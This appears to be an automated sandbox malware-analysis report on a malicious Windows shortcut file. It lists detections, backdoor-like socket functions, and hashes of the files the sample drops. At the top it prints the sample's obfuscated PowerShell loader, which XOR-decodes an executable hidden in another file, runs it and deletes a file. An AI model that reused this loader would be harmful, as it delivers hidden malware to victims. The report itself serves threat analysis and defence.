vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;

Language, Device and Operating System Detection

Yara detected Obfuscated Powershell

Source: Yara match

File source: knfV5IVjEV.lnk, type: SAMPLE

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DEBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_00007FF7F1DEBAFC

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	8_2_00007FF7F1DDF964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	8_2_00007FF7F1DB2B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD2930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,	8_2_00007FF7F1DD2930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD0070 calloc,calloc,calloc,bind,WSAGetLastError,	8_2_00007FF7F1DD0070
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	12_2_00007FF700E8F964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E82930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,	12_2_00007FF700E82930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E62B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	12_2_00007FF700E62B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E80070 calloc,calloc,calloc,bind,WSAGetLastError,	12_2_00007FF700E80070

ID:	1430699
Product:	CloudBasic
Start time:	03:01:16
Start date:	24.04.2024
Sample:	knfV5IVjEV
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	9d6c79c0b395cceb83662aa3f7ed0123
SHA1:	65f5f7d127c478522e9669200de20000edcb6cfb
SHA256:	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Filetype:	Windows Shortcut (20020/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\GSlLzFnTov\GSlLzFnTov.exe	PE32+ executable (console) x86-64, for MS Windows	EAC53DDAFB5CC9E780A7CC086CE7B2B1	C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F	D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbsi0lfi.m4s.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izk42yes.vps.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltnleziw.dj4.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\Desktop\knfV5IVjEV	Hangul (Korean) Word Processor File 5.x	F092754547BBEAD9D23EFF09F6193A01	13779CECB25031B721FAC453EFD8762F2F54DAF7	A5B2971F5651589FE2F214C66DF32FF5350892975A97239EBF2FB81E08B58D77
\Device\ConDrv	ASCII text, with CR, LF line terminators	511CC06AC43E809AF9D1B85DA54FEA7B	BB215B0FED81B2EA14E77CEF1A49A7D4E403F615	BC073B4151937AD142E6FBA4515388914A9FE5485D2057F3C72BE9DCA79152AF

Windows Analysis Report
knfV5IVjEV.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report knfV5IVjEV.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
knfV5IVjEV.lnk